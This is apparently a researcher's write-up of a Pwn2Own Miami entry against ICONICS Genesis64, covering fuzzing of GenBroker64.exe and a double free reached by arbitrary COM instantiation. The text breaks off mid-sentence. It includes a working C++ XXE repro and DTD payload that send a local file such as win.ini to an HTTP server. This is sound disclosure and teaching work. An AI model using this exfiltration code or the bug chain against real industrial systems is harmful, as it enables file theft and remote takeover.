๐งพ Introduction
After participating in Pwn2Own Austin in 2021 and failing to land my remote kernel exploit Zenith (which you can read about here), I was eager to try again. It is fun and forces me to look at things I would never have looked at otherwise. The one thing I couldn't do during my last participation in 2021 was to fly on-site and soak in the whole experience. I wanted a massive adrenaline rush on stage (as opposed to being in the comfort of your home), to hang-out, to socialize and learn from the other contestants.

So when ZDI announced an in-person competition in Miami in 2022.. I was stoked but I knew nothing about Industrial Control System software (I still don't ๐ ). After googling around, I realized that several of the targets ran on Windows ๐ฎ which is the OS I am most familiar with, so that was a big plus given the timeline. The ZDI originally announced the contest at the end of October 2022, and it was supposed to happen about three months later, in January 2023.
In this blog post, I'm hoping to walk you through my journey of participating & demonstrating a winning 0-click remote entry on stage in Miami ๐ฌ. If you want to skip the details to the exploit code, everything is available on my GitHub repository Paracosme.
โ๏ธ Target selection
All right, let me set the stage. It is November 2021 in Seattle; the sun sets early, it is cozy and warm inside; and I have decided to try to participate in the contest. As I mentioned in the intro, I have about three months to discover an exploitable vulnerability and write a reliable enough exploit for it. Honestly, I thought that timeline was a bit tight given that I can only invest an hour or two on average per workday (probably double that for weekends). As a result, progress will be slow, and will require discipline to put in the hours after a full day of work ๐ซก. And if it doesn't go anywhere, then it doesn't. Things don't work out often in life, nothing new ๐คท๐ฝโโ๏ธ.
One thing I was excited about was to pick a target running on Windows to use my favorite debugger, WinDbg. Given the timeline, I felt good to not to have to fight with gdb and/or lldb ๐คข. But as I said above, I have no experience with anything related to ICS software. I don't know what it's supposed to do, where, how, when. Although I've tried to document myself as much as possible by reading all the literature I could find, I quickly realized that the infosec community didn't cover it that much.
Regarding the contest, the ZDI broke it down into four main categories with multiple targets, vectors, and cash prizes. Reading through the rules, I didn't really recognize any of the vendors, everything was very foreign to me. So, I started to look for something that checked a few boxes:
- I need to run a demo version of the software in a regular Windows VM to introspect the target easily through a debugger. I learned my lessons from my Zenith exploit where I couldn't debug my exploit on the real target. This time, I want to be able to debug the exploit on the real target to stand a chance to have it land during the contest.
- The target is written in a memory unsafe language like C or C++. It is nicer to reverse-engineer and certainly contains memory safety issues that I could use. In hindsight, it probably wasn't the best choice. Most of the other contestants exploited logic vulnerabilities which are in general: more reliable to exploit (less chance to lose the cash prize, less time spent building the exploit), and might be easier to find (more tooling opportunities?).
- Existing research/documentation/anything I can build on top of would be amazing.
After trying a few things for a week or two, I decided to target ICONICS Genesis64 in the Control Server category via the 0 click over-the-network vector. An ethernet cable is connecting you to the target device, and you throw your exploit against one of Genesis64's listening sockets and need to demonstrate code execution without any user interaction ๐ฅ.

Luigi Auriemma published a plethora of vulnerabilities affecting the GenBroker64.exe
server (which is part of Genesis64) in 2011. Many of those bugs look powerful and shallow, which gave me confidence that plenty more still exist today. At the same time, it was the only public thing I found, and it was a decade old, which is... a very long time ago.

๐ Vulnerability research
I started the adventure a few weeks after the official announcement by downloading a demo version of the software, installing it in a VM, and starting to reverse-engineer the GenBroker64.exe
service with laser focus. GenBroker64.exe
is a regular Windows program available in both 32 or 64-bit versions but ultimately will be run on modern Windows 10 64-bit with default configuration. In hindsight, I made a mistake and didn't spend enough time enumerating the attack surfaces available. Instead, I went after the same ones as Luigi when there were probably better / less explored candidates. Live and learn I guess ๐.
I opened the file in IDA and got confused at first as it thinks it is a .NET binary. This contradicted Luigi's findings I looked at previously ๐ค.

I ignored it, and looked for the code that manages the listening TCP socket on port 38080. I found that entry point and it was definitely written in C++ so the binary might just be a mixed of .NET & C++ ๐คท๐ฝโโ๏ธ. Regardless, I didn't spend time trying to understand the whys, I just started to get going on the grind instead. Reverse-engineering it, function by function, understanding more and more the various structures and software abstractions. You know how this goes. Making your Hex-Rays output pretty, having ten different variables named dunno_x
and all that fun stuff.
Understanding the target
After a month of daily reverse-engineering, I was moving along, and I felt like I understood better the first order attack surfaces exposed by port 38080. It doesn't mean I understood everything going on, but I was building expertise. GenBroker64.exe
appeared to be brokering conversations between a client and maybe some ICS hardware. Who knows. I had a good understanding of this layer that received custom "messages" that were made of more primitive types: strings, arrays of strings, integers, VARIANTs, etc. This layer looked like the very area Luigi attacked in 2011. I could see extra checks added here and there. I guess I was on the right track.
I was also seeing a lot of things related to the Microsoft Foundation Class (MFC) library, which I needed to familiarize myself with. Things like CArchive, ATL::CString, etc.

I started to see bugs and low-severity security issues like divisions by zero, null dereferences, infinite recursions, out-of-bounds reads, etc. Although it felt comforting for a minute, those issues were far from what I needed to pop calc remotely without user interaction. On the right track still, but no cigar. The clock was ticking, and I started to wonder if fuzzing could be helpful. The deserialization layer surface was suitable for fuzzing, and I probably could harness the target quickly thanks to the accumulated expertise. The wtf fuzzer I released a bit ago seemed like a good candidate, and so that's what I used. It's always a special feeling when a tool you wrote is solving one of your problems ๐ The plan was to kick off some fuzzing quickly while I continued on exploring the surface manually.
Harnessing the target
The custom messages received by GenBroker64.exe
are stored in a receive buffer that looks liked the following:
struct TcpRecvBuffer_t {
TcpRecvBuffer_t() { memset(this, 0, sizeof(*this)); }
uint64_t Vtbl;
uint64_t m_hFile;
uint64_t m_bCloseOnDelete;
uint64_t m_strFileName;
uint32_t m_dFoo;
uint32_t m_pTM;
uint64_t m_nGrowBytes;
uint64_t m_nPosition;
uint64_t m_nBufferSize;
uint64_t m_nFileSize;
uint64_t m_lpBuffer;
};
m_lpBuffer
points to the raw bytes received off the socket, and so injecting the test case in memory should be straightforward. I put together a client that sent a large packet (0x1'000 bytes long) to ensure there would be enough storage in the buffer to fuzz. I took snapshot of GenBroker64.exe
just after the relevant WSOCK32!recv
call as you can see below:
GenBroker64+0x83dd0:
00000001`40083dd0 83f8ff cmp eax,0FFFFFFFFh
kd> ub .
00000001'40083dc0 4053 push rbx
00000001'40083dc2 4883ec30 sub rsp,30h
00000001'40083dc6 488b4908 mov rcx,qword ptr [rcx+8]
00000001`40083dca ff15b8aa0200 call qword ptr [GenBroker64+0xae888 (00000001`400ae888)]
kd> dqs 00000001`400ae888
00000001`400ae888 00007ffb`f27e1010 WSOCK32!recv
kd> r @rax
rax=0000000000001000
kd> kp
# Child-SP RetAddr Call Site
00 00000000`0a48fb10 00000001`4008a9fc GenBroker64+0x83dd0
01 00000000`0a48fb50 00000001`40086783 GenBroker64+0x8a9fc
02 00000000`0a48fdf0 00000001`4008609d GenBroker64+0x86783
03 00000000`0a48fe20 00007ffc`0cd07bd4 GenBroker64+0x8609d
04 00000000`0a48ff30 00007ffc`0db0ce71 KERNEL32!BaseThreadInitThunk+0x14
05 00000000`0a48ff60 00000000`00000000 ntdll!RtlUserThreadStart+0x21
Then, I wrote a simple fuzzer module that wrote the test case at the end of the receive buffer to ensure out-of-bound memory accesses will trigger access violations when accessing the guard page behind it. I also updated the size of the amount of bytes received by recv
as well as the start address (m_lpBuffer
). The TcpRecvBuffer_t
structure was stored on the stack. This is what the module looked like:
bool InsertTestcase(const uint8_t *Buffer, const size_t BufferSize) {
const uint64_t MaxBufferSize = 0x1'000;
if (BufferSize > MaxBufferSize) {
return true;
}
struct TcpRecvBuffer_t {
TcpRecvBuffer_t() { memset(this, 0, sizeof(*this)); }
uint64_t Vtbl;
uint64_t m_hFile;
uint64_t m_bCloseOnDelete;
uint64_t m_strFileName;
uint32_t m_dFoo;
uint32_t m_pTM;
uint64_t m_nGrowBytes;
uint64_t m_nPosition;
uint64_t m_nBufferSize;
uint64_t m_nFileSize;
uint64_t m_lpBuffer;
};
static_assert(offsetof(TcpRecvBuffer_t, m_lpBuffer) == 0x48);
//
// Calculate and read the TcpRecvBuffer_t pointer saved on the stack.
//
const Gva_t Rsp = Gva_t(g_Backend->GetReg(Registers_t::Rsp));
const Gva_t TcpRecvBufferAddr = g_Backend->VirtReadGva(Rsp + Gva_t(0x30));
//
// Read the TcpRecvBuffer_t structure.
//
TcpRecvBuffer_t TcpRecvBuffer;
if (!g_Backend->VirtReadStruct(TcpRecvBufferAddr, &TcpRecvBuffer)) {
fmt::print("VirtWriteDirty failed to write testcase at {}\n",
fmt::ptr(Buffer));
return false;
}
//
// Calculate the testcase address so that it is pushed towards the end of the
// page to benefit from the guard page.
//
const Gva_t BufferEnd = Gva_t(TcpRecvBuffer.m_lpBuffer + MaxBufferSize);
const Gva_t TestcaseAddr = BufferEnd - Gva_t(BufferSize);
//
// Insert testcase in memory.
//
if (!g_Backend->VirtWriteDirty(TestcaseAddr, Buffer, BufferSize)) {
fmt::print("VirtWriteDirty failed to write testcase at {}\n",
fmt::ptr(Buffer));
return false;
}
//
// Set the size of the testcase.
//
g_Backend->SetReg(Registers_t::Rax, BufferSize);
//
// Update the buffer address.
//
TcpRecvBuffer.m_lpBuffer = TestcaseAddr.U64();
if (!g_Backend->VirtWriteStructDirty(TcpRecvBufferAddr, &TcpRecvBuffer)) {
fmt::print("VirtWriteDirty failed to update the TcpRecvBuffer.m_lpBuffer "
"pointer\n");
return false;
}
return true;
}
When harnessing a target with wtf, there are numerous events or API calls that can't execute properly inside the runtime environment. I/Os and context switching are a few examples but there are more. Knowing how to handle those events are usually entirely target specific. It can be as easy as nop-ing a call and as tricky as emulating the effect of a complex API. This is a tricky balancing act because you want to avoid forcing your target into acting differently than it would when executed for real. Otherwise you are risking to run into bugs that only exist in the reality you built ๐พ.
Thankfully, GenBroker64.exe
wasn't too bad; I nop'd a few functions that lead to I/Os but they didn't impact the code I was fuzzing:
bool Init(const Options_t &Opts, const CpuState_t &) {
//
// Make ExGenRandom deterministic.
//
// kd> ub fffff805`3b8287c4 l1
// nt!ExGenRandom+0xe0:
// fffff805`3b8287c0 480fc7f2 rdrand rdx
const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4);
if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) {
DebugPrint("Hit ExGenRandom!\n");
Backend->Rdx(Backend->Rdrand());
})) {
return false;
}
const uint64_t GenBroker64Base = g_Dbg.GetModuleBase("GenBroker64");
const Gva_t EndFunct = Gva_t(GenBroker64Base + 0x85FCC);
if (!g_Backend->SetBreakpoint(EndFunct, [](Backend_t *Backend) {
DebugPrint("Finished!\n");
Backend->Stop(Ok_t());
})) {
return false;
}
if (!g_Backend->SetBreakpoint(
"combase!CoCreateInstance", [](Backend_t *Backend) {
DebugPrint("combase!CoCreateInstance({:#x})\n",
Backend->VirtRead8(Gva_t(Backend->Rcx())));
g_Backend->Stop(Ok_t());
})) {
return false;
}
const Gva_t DnsCacheIsKnownDns(0x1400794F0);
if (!g_Backend->SetBreakpoint(DnsCacheIsKnownDns, [](Backend_t *Backend) {
DebugPrint("DnsCacheIsKnownDns\n");
g_Backend->SimulateReturnFromFunction(0);
})) {
return false;
}
const Gva_t CMemFileGrowFile(0x14009653B);
if (!g_Backend->SetBreakpoint(CMemFileGrowFile, [](Backend_t *Backend) {
DebugPrint("CMemFile::GrowFile\n");
g_Backend->Stop(Ok_t());
})) {
return false;
}
if (!g_Backend->SetBreakpoint("KERNELBASE!Sleep", [](Backend_t *Backend) {
DebugPrint("KERNELBASE!Sleep\n");
g_Backend->Stop(Ok_t());
})) {
return false;
}
if (!g_Backend->SetBreakpoint("nt!MiIssuePageExtendRequest",
[](Backend_t *Backend) {
DebugPrint("nt!MiIssuePageExtendRequest\n");
g_Backend->Stop(Ok_t());
})) {
return false;
}
//
// Install the usermode crash detection hooks.
//
if (!SetupUsermodeCrashDetectionHooks()) {
return false;
}
return true;
}
I crafted manually a few packets to be used as a corpus, ran it on my laptop, and finally went to bed calling it quits for the day ๐ด. I woke up the following day and was welcomed with a few findings. Exciting. It's like waking up early on Christmas morning, hoping to find gifts under the tree ๐. Though, after looking at them, reality came back pretty fast. I realized that all the findings were some of the low-severity issues I mentioned earlier. Oh well, whatever; that's how it goes sometimes. I improved the corpus a little bit, and let the fuzzer drills through the code.
Pressure was building up as the deadline approached. I felt my progress was stalling, and it didn't feel good. I reverse-engineered myself enough times to know that I needed somewhat of a break to recharge my batteries a bit. What works best for me is to accomplish something easy, and measurable to get a supply of dopamine. I decided to get back to the fuzzer I had been running unsupervised.
Triaging findings
wtf doesn't know how handle I/Os, and stops when a context switch to prevent executing code from a different process. Those behaviors combined mean that the fuzzer often runs into situations that lead to a context switch to occur. In general, it is a symptom of poor harnessing because the execution of your test case is interrupted before it probably should have.
I had many of those test cases, so looking at them closely was both rewarding, and a good way to improve the fuzzing campaign. In general, this is pretty time-consuming because it highlights an area of the code you don't know much about, and you need to answer the question "how to handle it properly". Unfortunately, "debugging" test cases in wtf is basic; you have an execution trace that spans user and kernel-mode. It's usually gigabytes long so you are literally scrolling looking for a needle in a hell of a haystack ๐.
I eventually found a very bizarre one. The execution stopped while trying to load a COM object, which triggered an I/O followed by a context switch. After looking closer, it seemed to be triggered from an area of code (I thought) I knew very well: that deserialization layer I mentioned. Another surprise was that the COM's class identifier came directly from the test case bytes... what the hell? ๐ฎ Instantiating an arbitrary COM object? Exciting and wild I thought. I first assumed this was a bug I had introduced when harnessing or inserting the test case in memory. I built a proof-of-concept to reproduce and debug this live.. and I indeed stepped-through the code that read a class ID, and instantiated any COM object.
The code was part of mfc140u.dll
, and not GenBroker64.exe
which made me feel slightly better... I didn't miss it. I did miss a code-path that connected the deserialization layer to that function in mfc140u.dll
. Missing something never feels great, but it is an essential part of the job. The best thing you can do is try to transform this even into a learning opportunity ๐.
So, how did I miss this while spending so much time in this very area? The function doing the deserialization was a big switch-case statement where each case handles a specific message type. Each message is made of primitive types like strings, integers, arrays, etc. As an example, below is the function that handles the deserialization of messages with identifier 89AB
:
void __fastcall PayloadReq89AB_t::ReadFromArchive(PayloadReq89AB_t *Payload, Archive_t *Archive) {
// ...
if ( (Archive->m_nMode & ArchiveReadMode) != 0 ) {
Archive::ReadUint32(Archive, Payload);
Utils::ReadVariant(&Payload->Variant1, Archive);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String1);
Archive::ReadUint32__(Archive, Payload->pad);
Archive::ReadUint32__(Archive, &Payload->pad[4]);
Archive::ReadUint32__(Archive, &Payload->pad[8]);
Archive::ReadUint32_(Archive, &Payload->pad[12]);
Utils::ReadVariant(&Payload->Variant2, Archive);
Utils::ReadVariant(&Payload->Variant3, Archive);
Utils::ReadVariant(&Payload->Variant4, Archive);
Utils::ReadVariant(&Payload->Variant5, Archive);
Utils::ReadVariant(&Payload->Variant6, Archive);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String2);
Archive::ReadUint32(Archive, &Payload->D0);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String3);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String4);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String5);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String6);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String7);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String8);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String9);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->StringA);
Archive::ReadUint32(Archive, &Payload->Q90);
Utils::ReadVariant(&Payload->Variant7, Archive);
Archive::ReadString((CArchive *)Archive, (CString *)&Payload->StringB);
Archive::ReadUint32(Archive, &Payload->Dunno);
}
// ...
}
One of the primitive types is a VARIANT. For those unfamiliar with this structure, it is used a lot in Windows, and is made of an integer that tells you how to interpret the data that follows. The type is an integer followed by a giant union
:
typedef struct tagVARIANT {
struct {
VARTYPE vt;
WORD wReserved1;
WORD wReserved2;
WORD wReserved3;
union {
LONGLONG llVal;
LONG lVal;
BYTE bVal;
SHORT iVal;
FLOAT fltVal;
DOUBLE dblVal;
VARIANT_BOOL boolVal;
VARIANT_BOOL __OBSOLETE__VARIANT_BOOL;
SCODE scode;
CY cyVal;
DATE date;
BSTR bstrVal;
IUnknown *punkVal;
IDispatch *pdispVal;
SAFEARRAY *parray;
BYTE *pbVal;
SHORT *piVal;
LONG *plVal;
LONGLONG *pllVal;
FLOAT *pfltVal;
DOUBLE *pdblVal;
VARIANT_BOOL *pboolVal;
VARIANT_BOOL *__OBSOLETE__VARIANT_PBOOL;
SCODE *pscode;
CY *pcyVal;
DATE *pdate;
BSTR *pbstrVal;
IUnknown **ppunkVal;
IDispatch **ppdispVal;
SAFEARRAY **pparray;
VARIANT *pvarVal;
PVOID byref;
CHAR cVal;
USHORT uiVal;
ULONG ulVal;
ULONGLONG ullVal;
INT intVal;
UINT uintVal;
DECIMAL *pdecVal;
CHAR *pcVal;
USHORT *puiVal;
ULONG *pulVal;
ULONGLONG *pullVal;
INT *pintVal;
UINT *puintVal;
struct {
PVOID pvRecord;
IRecordInfo *pRecInfo;
} __VARIANT_NAME_4;
} __VARIANT_NAME_3;
} __VARIANT_NAME_2;
DECIMAL decVal;
} VARIANT;
Utils::ReadVariant
is the name of the function that reads a VARIANT
from a stream of bytes, and it roughly looked like this:
void Utils::ReadVariant(tagVARIANT *Variant, Archive_t *Archive, int Level) {
TRY {
return ReadVariant_((CArchive *)Archive, (COleVariant *)Variant);
} CATCH_ALL(e) {
VariantClear(Variant);
}
}
HRESULT Utils::ReadVariant_(tagVARIANT *Variant, Archive_t *Archive, int Level) {
VARTYPE VarType = Archive.ReadUint16();
if((VarType & VT_ARRAY) != 0) {
// Special logic to unpack arrays..
return ..;
}
Size = VariantTypeToSize(VarType);
if (Size) {
Variant->vt = VarType;
return Archive.ReadInto(&Variant->decVal.8, Size);
}
if(!CheckVariantType(VarType)) {
// ...
throw Something();
}
return Archive >> Variant; // operator>> is imported from MFC
}
The latest Archive>>Variant
statement in Utils::ReadVariant_
is actually what calls into the mfc140u
module, and it is also the function that loads the COM object. I basically ignored it and thought it wouldn't be interesting ๐ณ. Code that interacts with different subsystem and/or third-party APIs are actually very important to audit for security issues. Those components might even have been written by different people or teams. They might have had different level of scrutiny, different level of quality, or different threat models altogether. That API might expect to receive sanitized data when you might be feeding it data arbitrary controlled by an attacker. All of the above make it very likely for a developer to introduce a mistake that can lead to a security issue. Anyways, tough pill to swallow.
First, ReadVariant_
reads an integer to know what the variant holds. If it is an array, then it is handled by another function. VariantTypeToSize
is a tiny function that returns the number of bytes to read based variant's type:
size_t VariantTypeToSize(VARTYPE VarType) {
switch(VarType) {
case VT_I1: return 1;
case VT_UI2: return 2;
case VT_UI4:
case VT_INT:
case VT_UINT:
case VT_HRESULT:
return 4;
case VT_I8:
case VT_UI8:
case VT_FILETIME:
return 8;
default:
return 0;
}
}
It's important to note that it ignores anything that isnt't integer like (uint8_t
, uint16_t
, uint32_t
, etc.) by returning zero. Otherwise, it returns the number of bytes that needs to be read for the variant's content. Makes sense right? If VariantTypeToSize
returns zero, then CheckVariantType
is used to as sanitization to only allow certain types:
bool CheckVariantType(VARTYPE VarType) {
if((VarType & 0x2FFF) != VarType) {
return false;
}
switch(VarType & 0xFFF) {
case VT_EMPTY:
case VT_NULL:
case VT_I2:
case VT_I4:
case VT_R4:
case VT_R8:
case VT_CY:
case VT_DATE:
case VT_BSTR:
case VT_ERROR:
case VT_BOOL:
case VT_VARIANT:
case VT_I1:
case VT_UI1:
case VT_UI2:
case VT_UI4:
case VT_I8:
case VT_UI8:
case VT_INT:
case VT_UINT:
case VT_HRESULT:
case VT_FILETIME:
return true;
break;
default:
return false;
}
}
Only certain types are allowed, otherwise Utils::ReadVariant_
throws an exception when CheckVariantType
returns false. This looked solid to me.
The first trick is how the VT_EMPTY
type is handled. If one is received, VariantTypeToSize
returns zero and CheckVariantType
returns true, which leads us right into mfc140u
's operator<<
function. So what though? How do we go from sending an empty variant to instantiating a COM object? ๐ค
The second trick enters the room. When utils::ReadVariant
reads the variant type it consumed bytes from the stream which moved the buffer cursor forward. But the MFC's operator>>
also needs to know the variant type.. do you see where this is going now? To do that, it needs to read another two bytes off the stream.. which means that we are now able to send arbitrary variant types, and bypass the allow list in CheckVariantType
. Pretty cool, huh?
As mentioned earlier, MFC is a library authored and shipped by Microsoft, so there's a good chance this function is documented somewhere. After googling around, I found its source code in my Visual Studio installation (C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.29.30133\atlmfc\src\mfc\olevar.cpp
) and it looked like this:
CArchive& AFXAPI operator>>(CArchive& ar, COleVariant& varSrc) {
LPVARIANT pSrc = &varSrc;
ar >> pSrc->vt;
// ...
switch(pSrc->vt) {
// ...
case VT_DISPATCH:
case VT_UNKNOWN: {
LPPERSISTSTREAM pPersistStream = NULL;
CArchiveStream stm(&ar);
CLSID clsid;
ar >> clsid.Data1;
ar >> clsid.Data2;
ar >> clsid.Data3;
ar.EnsureRead(&clsid.Data4[0], sizeof clsid.Data4);
SCODE sc = CoCreateInstance(clsid, NULL,
CLSCTX_ALL | CLSCTX_REMOTE_SERVER,
pSrc->vt == VT_UNKNOWN ? IID_IUnknown : IID_IDispatch,
(void**)&pSrc->punkVal);
if(sc == E_INVALIDARG) {
sc = CoCreateInstance(clsid, NULL,
CLSCTX_ALL & ~CLSCTX_REMOTE_SERVER,
pSrc->vt == VT_UNKNOWN ? IID_IUnknown : IID_IDispatch,
(void**)&pSrc->punkVal);
}
AfxCheckError(sc);
TRY {
sc = pSrc->punkVal->QueryInterface(
IID_IPersistStream, (void**)&pPersistStream);
if(FAILED(sc)) {
sc = pSrc->punkVal->QueryInterface(
IID_IPersistStreamInit, (void**)&pPersistStream);
}
AfxCheckError(sc);
AfxCheckError(pPersistStream->Load(&stm));
} CATCH_ALL(e) {
if(pPersistStream != NULL) {
pPersistStream->Release();
}
pSrc->punkVal->Release();
THROW_LAST();
}
END_CATCH_ALL
pPersistStream->Release();
}
return ar;
}
}
A class identifier is indeed read directly from the archive, and a COM object is instantiated. Although we can instantiate any COM object, it needs to implement IID_IPersistStream or IID_IPersistStreamInit otherwise the function bails. If you are not familiar with this interface, here's what the MSDN says about it:
Enables the saving and loading of objects that use a simple serial stream for their storage needs.
You can serialize such an object with Save, send those bytes over a socket / store them on the filesystem, and recreate the object on the other side with Load. The other exciting detail is that the COM object loads itself from the stream in which we can place arbitrary content (via the socket).
This seemed highly insecure so I was over the moon. I knew there would be a way to exploit that behavior although I might not find a way in time. But I was convinced there has to be a way ๐ช๐ฝ.
๐ฅ Exploit engineering: Building Paracosme
First, I wrote tooling to enumerate available COM objects implementing either of the interfaces on a freshly installed system, and loaded them one by one. While doing that, I ran into a couple of memory safety issues that I reported to MSRC as CVE-2022-21971 and CVE-2022-21974. It turns out RTF documents (loadable via Microsoft Word) can embed arbitrary COM class IDs that get instantiated via OleLoad
. Once I had a list of candidates, I moved away from automation, and started to analyze them manually.
That search didn't yield much to be honest which was disappointing. The only mildly interesting thing I found is a way to exfiltrate arbitrary files via an XXE. It was really nice because itโs 100% reliable. I loaded an older MSXML
(Microsoft XML, 2933BF90-7B36-11D2-B20E-00C04F983E60
), and sent a crafted XML document in the stream to exfiltrate an arbitrary file to a remote HTTP server. Maybe this trick is useful to somebody one day, so here is a repro:
#include <cinttypes>
#include <cstdint>
#include <optional>
#include <shlwapi.h>
#include <string>
#include <unordered_map>
#include <windows.h>
#pragma comment(lib, "shlwapi.lib")
std::optional<GUID> Guid(const std::string &S) {
GUID G = {};
if (sscanf_s(S.c_str(),
"{%8" PRIx32 "-%4" PRIx16 "-%4" PRIx16 "-%2" PRIx8 "%2" PRIx8 "-"
"%2" PRIx8 "%2" PRIx8 "%2" PRIx8 "%2" PRIx8 "%2" PRIx8 "%2" PRIx8
"}",
&G.Data1, &G.Data2, &G.Data3, &G.Data4[0], &G.Data4[1],
&G.Data4[2], &G.Data4[3], &G.Data4[4], &G.Data4[5], &G.Data4[6],
&G.Data4[7]) != 11) {
return std::nullopt;
}
return G;
}
int main(int argc, char *argv[]) {
const char *Key = "{2933BF90-7B36-11D2-B20E-00C04F983E60}";
const auto &ClassId = Guid(Key);
CoInitialize(nullptr);
if (!ClassId.has_value()) {
printf("Guid failed w/ '%s'\n", Key);
return EXIT_FAILURE;
}
printf("Trying to create %s\n", Key);
IUnknown *Unknown = nullptr;
HRESULT Hr = CoCreateInstance(ClassId.value(), nullptr, CLSCTX_ALL,
IID_IUnknown, (LPVOID *)&Unknown);
if (FAILED(Hr)) {
Hr = CoCreateInstance(ClassId.value(), nullptr, CLSCTX_ALL, IID_IDispatch,
(LPVOID *)&Unknown);
}
if (FAILED(Hr)) {
printf("Failed CoCreateInstance %s\n", Key);
return EXIT_FAILURE;
}
IPersistStream *PersistStream = nullptr;
Hr = Unknown->QueryInterface(IID_IPersistStream, (LPVOID *)&PersistStream);
DWORD Return = EXIT_SUCCESS;
if (SUCCEEDED(Hr)) {
printf("SUCCESS %s!\n", Key);
// - Content of xxe.dtd:
// ```
// <!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
// <!ENTITY % root "<!ENTITY % oob SYSTEM 'http://localhost:8000/file?%payload;'>">
// %root;
// %oob;
// ```
const char S[] = R"(<?xml version="1.0"?>
<!DOCTYPE malicious [
<!ENTITY % sp SYSTEM "http://localhost:8000/xxe.dtd">
%sp;&root;
]>))";
IStream *Stream = SHCreateMemStream((const BYTE *)S, sizeof(S));
PersistStream->Load(Stream);
Stream->Release();
}
if (PersistStream) {
PersistStream->Release();
}
Unknown->Release();
return Return;
}
This is what it looks like when running it:

This felt somewhat like progress, but realistically it didn't get me closer to demonstrating remote code execution against the target ๐ I didn't think the ZDI would accept arbitrary file exfiltration as a way to demonstrate RCE, but in retrospect I probably should have asked. I also could have looked for an interesting file to exfiltrate; something with credentials that would allow me to escalate privileges somehow. But instead, I went to the grind.
I had been playing with the COM thing for a while now, but something big had been in front of my eyes this whole time. One afternoon, I was messing around and started loading some of the candidates I gathered earlier, and GenBroker64.exe
crashed ๐ฎ
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
OLEAUT32!VarWeekdayName+0x22468:
00007ffa'e620c7f8 488b01 mov rax,qword ptr [rcx] ds:00000000'2e5a2fd0=????????????????
What the hell, I thought? I tried it again.. and the crash reproduced.
Understanding the bug
After looking at the code closer, I started to understand what was going on. In operator>>
we can see that if the Load()
call throws an exception, it is caught to clean up, and Release()
both pPersistStream
& pSrc->punkVal
([2]
). That makes sense.
CArchive& AFXAPI operator>>(CArchive& ar, COleVariant& varSrc) {
LPVARIANT pSrc = &varSrc;
ar >> pSrc->vt;
// ...
switch(pSrc->vt) {
// ...
case VT_DISPATCH:
case VT_UNKNOWN: {
LPPERSISTSTREAM pPersistStream = NULL;
CArchiveStream stm(&ar);
// ...
// [1]
SCODE sc = CoCreateInstance(clsid, NULL,
CLSCTX_ALL | CLSCTX_REMOTE_SERVER,
pSrc->vt == VT_UNKNOWN ? IID_IUnknown : IID_IDispatch,
(void**)&pSrc->punkVal);
// ...
TRY {
sc = pSrc->punkVal->QueryInterface(
IID_IPersistStream, (void**)&pPersistStream);
// ...
AfxCheckError(pPersistStream->Load(&stm));
} CATCH_ALL(e) {
// [2]
if(pPersistStream != NULL) {
pPersistStream->Release();
}
pSrc->punkVal->Release();
THROW_LAST();
}
The subtlety, though, is that the pointer to the instantiated COM object has been written into pSrc
([1]
). pSrc
is a reference to a VARIANT
object that the caller passed. This is an important detail because Utils::ReadVariant
will also catch any exceptions, and will clear Variant
:
void Utils::ReadVariant(tagVARIANT *Variant, Archive_t *Archive, int Level) {
TRY {
return ReadVariant_((CArchive *)Archive, (COleVariant *)Variant);
} CATCH_ALL(e) {
VariantClear(Variant);
}
}
Because Variant
has been modified by operator>>
, VariantClear sees that the variant is holding a COM instance, and so it needs to free it which leads to a double free... ๐ฅ Unfortunately, IDA (still?) doesn't have good support for exception handling in the Hex-Rays decompiler which makes it hard to see that logic.

This bug is interesting. I feel like the MFC operator>>
could protect callers from bugs like this by NULL
'ing out pSrc->punkVal
after releasing it, and updating the variant type to VT_EMPTY
. Or, modify pSrc
only when the function is about to return a success, but not before. Otherwise it is hard for the exception handler of Utils::ReadVariant
even to know if Variant
needs to be cleared or not. But who knows, there might be legit reasons as to why the operator works this way ๐คท๐ฝโโ๏ธ Regardless, I wouldn't be surprised if bugs like this exist in other applications ๐ค. Check out paracosme-poc.py if you would like to trigger this behavior.
The planets were slowly aligning, and I was still in the game. There should be enough time to build an exploit based on what I know. Before digging into the exploit engineering, let's do a recap:
- GenBroker64.exe
listens on TCP:38080 and deserializes messages sent by the client
- Although it tries to allow only certain VARIANT types, there is a bug. If the user sends a VT_EMPTY
VARIANT, the MFC operator>>
is called which will read a VARIANT off the stream. GenBroker64.exe
doesn't rewind the stream so the MFC reads another VARIANT type that doesn't go through the allow list. This allows to bypass the allow list and have the MFC instantiate an arbitrary COM object.
- If the COM object throws an exception while either the QueryInterface
or Load
method is called, the instantiated COM object will be double-free'd. The second free is done by VariantClear, which internally calls the object's virtual Release
method.
If we can reclaim the freed memory after the first free but before VariantClear, then we control a vtable pointer, and as a result hijack control flow ๐ฅ.
Let's now work on engineering planet alignments ๐ซ.
Can I reclaim the chunk with controlled data?
I had a lot of questions but the important ones were:
- Can I run multiple clients at the same time, and if so, can I use them to reclaim the memory chunk?
- Is there any behavior in the heap allocator that prevents another thread from reclaiming the chunk?
- Assuming I can reclaim it, can I fill it with controlled data?
To answer the first two questions, I ran GenBroker64.exe
under a debugger to verify that I could execute other clients while the target thread was frozen. While doing that, I also confirmed that the freed chunk can be reclaimed by another client when the target thread is frozen right after the first free.
The third question was a lot more work though. I first looked into leveraging another COM object that allowed me to fill the reclaimed chunk with arbitrary content via the Load
method. I modified the tooling I wrote to enumerate and find suitable candidates, but I eventually walked away. Many COM objects used a different allocator or were allocating off a different heap, and I never really found one that allowed me to control as much as I wanted off the reclaimed chunk.
I moved on, and started to look at using a different message to both reclaim and fill the chunk with controlled content. The message with the id 0x7d0
